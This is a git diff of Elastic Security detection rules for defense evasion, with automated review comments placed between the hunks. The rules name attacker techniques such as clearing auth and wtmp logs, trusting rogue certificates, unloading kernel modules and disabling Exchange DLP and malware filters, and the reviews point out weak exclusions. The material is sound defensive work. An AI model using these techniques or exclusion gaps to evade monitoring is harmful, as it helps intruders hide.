- "query": "event.category:process and event.type:(start or process_started) and\n process.name:security and process.args:\"add-trusted-cert\"\n",
+ "query": "event.category:process and event.type:(start or process_started) and\n process.name:security and process.args:\"add-trusted-cert\" and\n not process.parent.executable:(\"/Library/Bitdefender/AVP/product/bin/BDCoreIssues\" or \"/Applications/Bitdefender/SecurityNetworkInstallerApp.app/Contents/MacOS/SecurityNetworkInstallerApp\"\n)\n",
 "references": [
 "https://ss64.com/osx/security-cert.html"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.executable",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "bc1eeacf-2972-434f-b782-3a532b100d67",
 "severity": "medium",
@@ -54,5 +81,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 1
+ "version": 3
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_installutil_beacon.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_installutil_beacon.json
index 72ef939fd2c1c..360cb8235f570 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_installutil_beacon.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_installutil_beacon.json
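Review bot: The new exclusion keys on `process.parent.executable` paths under `/Library/Bitdefender` and `/Applications/Bitdefender`, which is a weaker anchor than the signer: whatever sits at those paths is trusted, and a vendor path change silently re-enables the false positives. If the endpoint data populates `process.parent.code_signature.subject_name` (and `.trusted`), pinning the exclusion to the Bitdefender signer is more durable; either way the two paths deserve a `false_positives` entry, which sits outside this hunk. Stylistically, the `\n)` before the trailing `\n` puts the closing parenthesis on its own line in the rendered query; ending the clause with `SecurityNetworkInstallerApp\")\n` reads cleaner.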
@@ -13,6 +13,28 @@ "license": "Elastic License v2", "name": "InstallUtil Process Making Network Connections", "query": "/* the benefit of doing this as an eql sequence vs kql is this will limit to alerting only on the first network connection */\n\nsequence by process.entity_id\n [process where event.type in (\"start\", \"process_started\") and process.name : \"installutil.exe\"]\n [network where process.name : \"installutil.exe\" and network.direction : (\"outgoing\", \"egress\")]\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "a13167f1-eec2-4015-9631-1fee60406dcf", "severity": "medium", @@ -34,7 +56,7 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/", "subtechnique": [ { @@ -48,5 +70,5 @@ } ], "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_kernel_module_removal.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_kernel_module_removal.json index 35c0cb2fb2645..b9d551d4ed320 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_kernel_module_removal.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_kernel_module_removal.json 
@@ -18,6 +18,23 @@ "references": [ "http://man7.org/linux/man-pages/man8/modprobe.8.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "cd66a5af-e34b-4bb0-8931-57d0a043f2ef", "severity": "high", @@ -76,5 +93,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_kubernetes_events_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_kubernetes_events_deleted.json index 54ca81401c213..f2f6e8184614d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_kubernetes_events_deleted.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_kubernetes_events_deleted.json 
@@ -14,13 +14,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Kubernetes Events Deleted", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE\" and \nevent.outcome:(Success or success)\n", + "note": "", + "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE\" and\nevent.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "8b64d36a-1307-4b2e-a77b-a0027e4d27c8", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -56,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_log_files_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_log_files_deleted.json index afaa771c5e752..dbc96fd9ee17c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_log_files_deleted.json 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_log_files_deleted.json
@@ -11,13 +11,31 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "System Log File Deletion",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
- "query": "file where event.type == \"deletion\" and \n file.path : \n (\n \"/var/run/utmp\", \n \"/var/log/wtmp\", \n \"/var/log/btmp\", \n \"/var/log/lastlog\", \n \"/var/log/faillog\",\n \"/var/log/syslog\", \n \"/var/log/messages\", \n \"/var/log/secure\", \n \"/var/log/auth.log\"\n )\n",
+ "note": "",
+ "query": "file where event.type == \"deletion\" and\n file.path :\n (\n \"/var/run/utmp\",\n \"/var/log/wtmp\",\n \"/var/log/btmp\",\n \"/var/log/lastlog\",\n \"/var/log/faillog\",\n \"/var/log/syslog\",\n \"/var/log/messages\",\n \"/var/log/secure\",\n \"/var/log/auth.log\"\n ) and\n not process.name : (\"gzip\")\n",
 "references": [
 "https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.path",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "aa895aea-b69c-4411-b110-8d7599634b30",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
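Review bot: The added `not process.name : ("gzip")` exclusion is keyed on the process basename only, and the files this rule guards (`/var/run/utmp`, `/var/log/wtmp`, `/var/log/auth.log`, `/var/log/secure`) are precisely the ones an intruder clears, so a name-only allow-list is a weak anchor for a medium-severity rule. Presuming the intent is log rotation, a narrower form such as `not process.executable : ("/bin/gzip", "/usr/bin/gzip")` or, if the source populates the field, `not (process.name : "gzip" and process.parent.name : "logrotate")` keeps the suppression while bounding it. Whichever is chosen, the field used should join `process.name` in `required_fields`, and the benign case belongs in `false_positives`, which lies outside this hunk.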
@@ -45,5 +63,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 4
+ "version": 6
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_as_elastic_endpoint_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_as_elastic_endpoint_process.json
index c19475e4c05f2..45767c200381d 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_as_elastic_endpoint_process.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_as_elastic_endpoint_process.json
@@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Endpoint Security Parent Process", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\", \"info\") and\n process.name : (\"esensor.exe\", \"elastic-endpoint.exe\") and\n process.parent.executable != null and\n /* add FPs here */\n not process.parent.executable : (\"C:\\\\Program Files\\\\Elastic\\\\*\", \n \"C:\\\\Windows\\\\System32\\\\services.exe\", \n \"C:\\\\Windows\\\\System32\\\\WerFault*.exe\", \n \"C:\\\\Windows\\\\System32\\\\wermgr.exe\")\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\", \"info\") and\n process.name : (\"esensor.exe\", \"elastic-endpoint.exe\") and\n process.parent.executable != null and\n /* add FPs here */\n not process.parent.executable : (\"C:\\\\Program Files\\\\Elastic\\\\*\",\n \"C:\\\\Windows\\\\System32\\\\services.exe\",\n \"C:\\\\Windows\\\\System32\\\\WerFault*.exe\",\n \"C:\\\\Windows\\\\System32\\\\wermgr.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "b41a13c6-ba45-4bab-a534-df53d0cfed6a", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", 
"tags": [ "Elastic", @@ -43,5 +61,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_renamed_autoit.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_renamed_autoit.json index 0e56479211592..2b81cba35eb20 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_renamed_autoit.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_renamed_autoit.json 
@@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Renamed AutoIt Scripts Interpreter", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\", \"info\") and\n process.pe.original_file_name : \"AutoIt*.exe\" and not process.name : \"AutoIt*.exe\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "2e1e835d-01e5-48ca-b9fc-7a61f7f11902", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_suspicious_werfault_childproc.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_suspicious_werfault_childproc.json index 72a0c6824033c..e02e32d8060b0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_suspicious_werfault_childproc.json 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_suspicious_werfault_childproc.json 
@@ -15,15 +15,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious WerFault Child Process", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"WerFault.exe\" and\n not process.name : (\"cofire.exe\",\n \"psr.exe\",\n \"VsJITDebugger.exe\",\n \"TTTracer.exe\",\n \"rundll32.exe\",\n \"LogiOptionsMgr.exe\") and\n not process.args : (\"/LOADSAVEDWINDOWS\",\n \"/restore\",\n \"RestartByRestartManager*\",\n \"--restarted\",\n \"createdump\",\n \"dontsend\",\n \"/watson\")\n", "references": [ "https://www.hexacorn.com/blog/2019/09/19/silentprocessexit-quick-look-under-the-hood/", "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx", "https://blog.menasec.net/2021/01/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "ac5012b8-8da8-440b-aaaf-aedafdea2dff", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", 
@@ -51,5 +74,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_trusted_directory.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_trusted_directory.json index 6605efbaffa02..03b7a8ba575e9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_trusted_directory.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_trusted_directory.json 
@@ -12,10 +12,23 @@ "language": "eql", "license": "Elastic License v2", "name": "Program Files Directory Masquerading", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and\n process.executable : \"C:\\\\*Program*Files*\\\\*.exe\" and\n not process.executable : (\"C:\\\\Program Files\\\\*.exe\", \"C:\\\\Program Files (x86)\\\\*.exe\", \"C:\\\\Users\\\\*.exe\", \"C:\\\\ProgramData\\\\*.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +63,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_werfault.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_werfault.json index a08e3040c6c95..399087dc7c090 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_werfault.json 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_werfault.json @@ -21,6 +21,48 @@ "https://www.hexacorn.com/blog/2019/09/20/werfault-command-line-switches-v0-1/", "https://app.any.run/tasks/26051d84-b68e-4afb-8a9a-76921a271b81/" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "6ea41894-66c3-4df7-ad6b-2c5074eb3df8", "severity": "medium", @@ -49,5 +91,5 @@ } ], "type": "eql", - "version": 4 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_dlp_policy_removed.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_dlp_policy_removed.json index f9f465ef3ee18..68371e6986647 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_dlp_policy_removed.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_dlp_policy_removed.json 
@@ -14,14 +14,48 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Exchange DLP Policy Removed", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-DlpPolicy\" and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-dlppolicy?view=exchange-ps", "https://docs.microsoft.com/en-us/microsoft-365/compliance/data-loss-prevention-policies?view=o365-worldwide" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "60f3adec-1df9-4104-9c75-b97d9f078b25", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +84,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_malware_filter_policy_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_malware_filter_policy_deletion.json index 0f2c612324234..b688d851b29d5 100644 
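Review bot: `related_integrations[0].version` is the bare string `"1.3.0"`; if this field is interpreted as a semver range, an exact value declares compatibility with that single o365 package release only, and a range such as `"^1.3.0"` may be what is intended — worth confirming against the schema before this is copied further. The identical pin is added in the malware_filter_policy_deletion, malware_filter_rule_mod, safe_attach_rule_disabled and mailboxauditbypassassociation hunks below. The `required_fields` list agrees with the five fields the visible `query` uses.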
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_malware_filter_policy_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_malware_filter_policy_deletion.json @@ -14,13 +14,47 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Exchange Malware Filter Policy Deletion", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-MalwareFilterPolicy\" and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-malwarefilterpolicy?view=exchange-ps" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "d743ff2a-203e-4a46-a3e3-40512cfe8fbb", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -49,5 +83,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_malware_filter_rule_mod.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_malware_filter_rule_mod.json index 7af0c1ea45d2a..46c71f7b84ed3 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_malware_filter_rule_mod.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_malware_filter_rule_mod.json 
@@ -14,14 +14,48 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Exchange Malware Filter Rule Modification", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-MalwareFilterRule\" or \"Disable-MalwareFilterRule\") and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-malwarefilterrule?view=exchange-ps", "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-malwarefilterrule?view=exchange-ps" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "ca79768e-40e1-4e45-a097-0e5fbc876ac2", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +84,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_safe_attach_rule_disabled.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_safe_attach_rule_disabled.json index 38a7edda3a4e9..4c9e9b914b73a 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_safe_attach_rule_disabled.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_safe_attach_rule_disabled.json @@ -14,13 +14,47 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Exchange Safe Attachment Rule Disabled", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Disable-SafeAttachmentRule\" and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-safeattachmentrule?view=exchange-ps" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "03024bd9-d23f-4ec1-8674-3cf1a21e130b", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -49,5 +83,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_mailboxauditbypassassociation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_mailboxauditbypassassociation.json index ae9512e52c705..a3413ed4e6c94 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_mailboxauditbypassassociation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_mailboxauditbypassassociation.json @@ -14,13 +14,42 @@ "language": "kuery", "license": "Elastic License v2", "name": "O365 Mailbox Audit Logging Bypass", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:Exchange and event.action:Set-MailboxAuditBypassAssociation and event.outcome:success\n", "references": [ "https://twitter.com/misconfig/status/1476144066807140355" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "675239ea-c1bc-4467-a6d3-b9e2cc7f676d", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -56,5 +85,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 5 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_defender_tampering.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_defender_tampering.json index da2a1eb166dd5..97278f5869220 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_defender_tampering.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_defender_tampering.json 
